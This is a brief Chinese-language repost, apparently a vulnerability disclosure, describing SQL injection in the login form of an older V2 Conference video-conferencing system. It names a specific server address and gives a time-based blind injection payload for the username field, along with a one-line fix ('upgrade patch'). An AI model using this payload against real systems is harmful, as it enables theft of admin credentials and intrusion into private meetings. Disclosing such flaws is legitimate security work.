|
|
|
绿盟视频会议系统SQL注入
发布时间:2015-12-01 点击率:次 来源:www.sytcke.com 作者:电脑技术学习网
通过注入能够拿到管理账户密码,然后登录后台查看会议密码,通过会议密码能够进入到远程会议中,恶意攻击者能够窃取某些敏感信息。
http://211.151.49.196:18080/V2Conf/jsp/user/loginAction.do
其实是V2 Conference视频会议系统较低版本的SQL注入,注入发生在登录时用户名的输入框内,使用以下注入语句可测试:
1 or (select benchmark(300000,md5(user())) from users where substring(username,1,5)=admin)#
修复方案:
升级补丁
来源 电脑技术网 www.sytcke.com
发表留言
|
|
发表留言请先登录!
|
免责声明:本站发布的信息和评论纯属网民个人行为,并不代表本站立场,如发现有违法信息或侵权行为,请直接与本站管理员联系,我们将在收到您的信息后24小时内作出处理!
Copyright © 十堰电脑维修 All Rights Reserved 鄂ICP备12000326号-1
电子邮箱:956066850@qq.com